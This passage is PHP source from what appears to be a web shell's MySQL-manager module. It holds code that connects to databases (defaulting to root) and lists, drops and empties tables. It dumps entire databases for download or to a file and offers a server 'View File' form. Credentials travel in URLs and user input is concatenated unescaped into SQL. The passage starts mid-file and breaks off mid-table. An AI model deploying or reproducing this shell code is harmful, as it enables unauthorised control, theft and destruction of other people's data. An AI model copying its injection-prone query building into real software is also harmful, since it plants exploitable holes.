978 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
979 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
980 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
981 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
982 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
983 echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
984 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
985 }
986 echo "</td></tr><tr>";
987 if (!$sql_sock) {
988 echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
989 echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
990 }
991 else {
992 //Start left panel
993 if (!empty($sql_db)) {
994 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
995 <?php
996 $result = mysql_list_tables($sql_db);
997 if (!$result) {echo mysql_smarterror();}
998 else {
999 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
1000 $c = 0;
1001 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
1002 if (!$c) {echo "No tables found in database.";}
1003 }
1004 }
1005 else {
1006 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
1007 <?php
1008 $result = mysql_list_dbs($sql_sock);
1009 if (!$result) {echo mysql_smarterror();}
1010 else {
1011 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
1012 <?php
1013 $c = 0;
1014 $dbs = "";
1015 while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
1016 echo "<option value=\"\">Databases (".$c.")</option>";
1017 echo $dbs;
1018 }
1019 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
1020 <?php
1021 }
1022 //End left panel
1023 echo "</td><td width=\"100%\">";
1024 //Start center panel
1025 $diplay = TRUE;
1026 if ($sql_db) {
1027 if (!is_numeric($c)) {$c = 0;}
1028 if ($c == 0) {$c = "no";}
1029 echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
1030 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
1031 echo "</b></center>";
1032 $acts = array("","dump");
1033 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1034 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1035 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1036 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1037 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1038 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1039 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1040 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1041 elseif ($sql_tbl_act == "insert") {
1042 if ($sql_tbl_insert_radio == 1) {
1043 $keys = "";
1044 $akeys = array_keys($sql_tbl_insert);
1045 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1046 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1047 $values = "";
1048 $i = 0;
1049 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1050 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1051 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1052 $sql_act = "query";
1053 $sql_tbl_act = "browse";
1054 }
1055 elseif ($sql_tbl_insert_radio == 2) {
1056 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1057 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1058 $result = mysql_query($sql_query) or print(mysql_smarterror());
1059 $result = mysql_fetch_array($result, MYSQL_ASSOC);
1060 $sql_act = "query";
1061 $sql_tbl_act = "browse";
1062 }
1063 }
1064 if ($sql_act == "query") {
1065 echo "<hr size=\"1\" noshade>";
1066 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1067 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
1068 if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
1069 }
1070 if (in_array($sql_act,$acts)) {
1071 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
1072 <form action="<?php echo $surl; ?>">
1073 <input type="hidden" name="act" value="sql">
1074 <input type="hidden" name="sql_act" value="newtbl">
1075 <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
1076 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
1077 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
1078 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
1079 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
1080 <input type="text" name="sql_newtbl" size="20">
1081 <input type="submit" value="Create">
1082 </form></td>
1083 <td width="30%" height="1"><b>Dump DB:</b>
1084 <form action="<?php echo $surl; ?>">
1085 <input type="hidden" name="act" value="sql">
1086 <input type="hidden" name="sql_act" value="dump">
1087 <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
1088 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
1089 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
1090 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
1091 <?php
1092 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
1093 if ($sql_act == "newtbl") {
1094 echo "<b>";
1095 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
1096 echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1097 }
1098 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1099 }
1100 elseif ($sql_act == "dump") {
1101 if (empty($submit)) {
1102 $diplay = FALSE;
1103 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1104 echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1105 $v = join (";",$dmptbls);
1106 echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1107 if ($dump_file) {$tmp = $dump_file;}
1108 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1109 echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1110 echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1111 echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1112 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
1113 echo "</form>";
1114 }
1115 else {
1116 $diplay = TRUE;
1117 $set = array();
1118 $set["sock"] = $sql_sock;
1119 $set["db"] = $sql_db;
1120 $dump_out = "download";
1121 $set["print"] = 0;
1122 $set["nl2br"] = 0;
1123 $set[""] = 0;
1124 $set["file"] = $dump_file;
1125 $set["add_drop"] = TRUE;
1126 $set["onlytabs"] = array();
1127 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1128 $ret = mysql_dump($set);
1129 if ($sql_dump_download) {
1130 @ob_clean();
1131 header("Content-type: application/octet-stream");
1132 header("Content-length: ".strlen($ret));
1133 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1134 echo $ret;
1135 exit;
1136 }
1137 elseif ($sql_dump_savetofile) {
1138 $fp = fopen($sql_dump_file,"w");
1139 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1140 else {
1141 fwrite($fp,$ret);
1142 fclose($fp);
1143 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1144 }
1145 }
1146 else {echo "<b>Dump: nothing to do!</b>";}
1147 }
1148 }
1149 if ($diplay) {
1150 if (!empty($sql_tbl)) {
1151 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
1152 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1153 $count_row = mysql_fetch_array($count);
1154 mysql_free_result($count);
1155 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1156 $tbl_struct_fields = array();
1157 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1158 if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
1159 if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
1160 if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
1161 if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
1162 $perpage = $sql_tbl_le - $sql_tbl_ls;
1163 if (!is_numeric($perpage)) {$perpage = 10;}
1164 $numpages = $count_row[0]/$perpage;
1165 $e = explode(" ",$sql_order);
1166 if (count($e) == 2) {
1167 if ($e[0] == "d") {$asc_desc = "DESC";}
1168 else {$asc_desc = "ASC";}
1169 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1170 }
1171 else {$v = "";}
1172 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1173 $result = mysql_query($query) or print(mysql_smarterror());
1174 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1175 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a> ";
1176 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a> ";
1177 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
1178 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> ";
1179 if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
1180 if ($sql_tbl_act == "insert") {
1181 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1182 if (!empty($sql_tbl_insert_radio)) { } //Not Ready
1183 else {
1184 echo "<br><br><b>Inserting row into table:</b><br>";
1185 if (!empty($sql_tbl_insert_q)) {
1186 $sql_query = "SELECT * FROM `".$sql_tbl."`";
1187 $sql_query .= " WHERE".$sql_tbl_insert_q;
1188 $sql_query .= " LIMIT 1;";
1189 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1190 $values = mysql_fetch_assoc($result);
1191 mysql_free_result($result);
1192 }
1193 else {$values = array();}
1194 echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
1195 foreach ($tbl_struct_fields as $field) {
1196 $name = $field["Field"];
1197 if (empty($sql_tbl_insert_q)) {$v = "";}
1198 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1199 $i++;
1200 }
1201 echo "</table><br>";
1202 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1203 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1204 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
1205 }
1206 }
1207 if ($sql_tbl_act == "browse") {
1208 $sql_tbl_ls = abs($sql_tbl_ls);
1209 $sql_tbl_le = abs($sql_tbl_le);
1210 echo "<hr size=\"1\" noshade>";
1211 echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> ";
1212 $b = 0;
1213 for($i=0;$i<$numpages;$i++) {
1214 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1215 echo $i;
1216 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1217 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1218 else {echo " ";}
1219 }
1220 if ($i == 0) {echo "empty";}
1221 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
1222 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
1223 echo "<tr>";
1224 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
1225 for ($i=0;$i<mysql_num_fields($result);$i++) {
1226 $v = mysql_field_name($result,$i);
1227 if ($e[0] == "a") {$s = "d"; $m = "asc";}
1228 else {$s = "a"; $m = "desc";}
1229 echo "<td>";
1230 if (empty($e[0])) {$e[0] = "a";}
1231 if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1232 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
1233 echo "</td>";
1234 }
1235 echo "<td><font color=\"green\"><b>Action</b></font></td>";
1236 echo "</tr>";
1237 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1238 echo "<tr>";
1239 $w = "";
1240 $i = 0;
1241 foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
1242 if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
1243 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1244 $i = 0;
1245 foreach ($row as $k=>$v)
1246 {
1247 $v = htmlspecialchars($v);
1248 if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
1249 echo "<td>".$v."</td>";
1250 $i++;
1251 }
1252 echo "<td>";
1253 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a> ";
1254 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> ";
1255 echo "</td>";
1256 echo "</tr>";
1257 }
1258 mysql_free_result($result);
1259 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1260 echo "<option value=\"\">With selected:</option>";
1261 echo "<option value=\"deleterow\">Delete</option>";
1262 echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
1263 }
1264 }
1265 else {
1266 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1267 if (!$result) {echo mysql_smarterror();}
1268 else
1269 {
1270 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
1271 $i = 0;
1272 $tsize = $trows = 0;
1273 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1274 {
1275 $tsize += $row["Data_length"];
1276 $trows += $row["Rows"];
1277 $size = view_size($row["Data_length"]);
1278 echo "<tr>";
1279 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
1280 echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a> </td>";
1281 echo "<td>".$row["Rows"]."</td>";
1282 echo "<td>".$row["Type"]."</td>";
1283 echo "<td>".$row["Create_time"]."</td>";
1284 echo "<td>".$row["Update_time"]."</td>";
1285 echo "<td>".$size."</td>";
1286 echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>";
1287 echo "</tr>";
1288 $i++;
1289 }
1290 echo "<tr bgcolor=\"000000\">";
1291 echo "<td><center><b>+</b></center></td>";
1292 echo "<td><center><b>".$i." table(s)</b></center></td>";
1293 echo "<td><b>".$trows."</b></td>";
1294 echo "<td>".$row[1]."</td>";
1295 echo "<td>".$row[10]."</td>";
1296 echo "<td>".$row[11]."</td>";
1297 echo "<td><b>".view_size($tsize)."</b></td>";
1298 echo "<td></td>";
1299 echo "</tr>";
1300 echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1301 echo "<option value=\"\">With selected:</option>";
1302 echo "<option value=\"tbldrop\">Drop</option>";
1303 echo "<option value=\"tblempty\">Empty</option>";
1304 echo "<option value=\"tbldump\">Dump</option>";
1305 echo "<option value=\"tblcheck\">Check table</option>";
1306 echo "<option value=\"tbloptimize\">Optimize table</option>";
1307 echo "<option value=\"tblrepair\">Repair table</option>";
1308 echo "<option value=\"tblanalyze\">Analyze table</option>";
1309 echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
1310 mysql_free_result($result);
1311 }
1312 }
1313 }
1314 }
1315 }
1316 else {
1317 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
1318 if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
1319 if (!empty($sql_act)) {
1320 echo "<hr size=\"1\" noshade>";
1321 if ($sql_act == "newdb") {
1322 echo "<b>";
1323 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1324 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1325 }
1326 if ($sql_act == "serverstatus") {
1327 $result = mysql_query("SHOW STATUS", $sql_sock);
1328 echo "<center><b>Server-status variables:</b><br><br>";
1329 echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
